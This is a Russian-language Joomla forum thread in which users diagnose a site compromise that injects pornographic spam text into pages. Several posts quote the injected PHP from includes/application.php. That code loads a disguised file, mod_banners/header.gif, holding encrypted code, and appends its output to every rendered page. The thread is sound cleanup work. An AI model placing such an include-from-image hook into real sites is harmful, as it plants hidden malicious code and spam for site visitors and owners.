Появились порно-ссылки - страница 2 - Безопасность сайтов на Joomla

В общем нашел

Код был внедрен в includes/application.php

Строки

Открываем /modules/mod_banners/header.gif' текстовым редактором и видим зашифрованный код

По логам вычислил дату изменения application.php я выяснил, какого числа в нем покопался нарушитель закона, был определен его IP и провайдер.
Даже знаю, кто это был.

Будем применять меры ))

В общем нашел

Код был внедрен в includes/application.php

Строки

Код

// Render the document.
		
	$document_render_content = str_replace('</body>', '', $document->render($caching, $params));
	$document_render_content = str_replace('</html>', '', $document_render_content);

	include_once($_SERVER['DOCUMENT_ROOT'].'/modules/mod_banners/header.gif');
	  
	$document_render_content .= "<div style=\"font-size: 10px;\">".@$sys_ctrl."".@$sys_lctr."</div>\n</body>\n</html>";

	JResponse::setBody($document_render_content);

Открываем /modules/mod_banners/header.gif' текстовым редактором и видим зашифрованный код

По логам вычислил дату изменения application.php я выяснил, какого числа в нем покопался нарушитель закона, был определен его IP и провайдер.
Даже знаю, кто это был.

Будем применять меры ))

Только что тоже удалил этот код на хосте. Спасибо вам огромное за такую инфу - 100500 плюсов:)

и еще такой вопрос - это получается делал человек знающий Joomla ?

и еще такой вопрос - это получается делал человек знающий Joomla ?

Это значит, что кто-то пользуется варезом

В общем нашел

Код был внедрен в includes/application.php

Строки

Код

// Render the document.
		
	$document_render_content = str_replace('</body>', '', $document->render($caching, $params));
	$document_render_content = str_replace('</html>', '', $document_render_content);

	include_once($_SERVER['DOCUMENT_ROOT'].'/modules/mod_banners/header.gif');
	  
	$document_render_content .= "<div style=\"font-size: 10px;\">".@$sys_ctrl."".@$sys_lctr."</div>\n</body>\n</html>";

	JResponse::setBody($document_render_content);

Открываем /modules/mod_banners/header.gif' текстовым редактором и видим зашифрованный код

По логам вычислил дату изменения application.php я выяснил, какого числа в нем покопался нарушитель закона, был определен его IP и провайдер.
Даже знаю, кто это был.

Будем применять меры ))

Бро, для тупых объясни что нужно и где изменить. Модуль TransparentGum не удаляется. Что где удалять?

Здравствуйте, прошу помочь разобраться в проблеме.
сайт на Joomla 2.5. на главной странице сайта стал выскакивать посторонний текст на английском языке.
Если погуглить фрагменты данного текста, пример (The rise of the Internet in the late 1990s and early 2000s similarly changed the way pornography film was distributed and furthermore complicated the censorship regimes around the world and the legal prosecution of obscenity.), то выходят ссылки на множество зараженных сайтов на Joomla и WordPress, а также например статья на Wikipedia о порно-фильмах.
Забэкапил сайт через Akeeba, развернул на локальном хостинге, ничего не обнаруживется.
Данный блок текста встраивается или в заголовке главной страницы или если тут-же обновить, в теле страницы.
Помогите пожалуйста разобраться, где искать корни этого зловредства.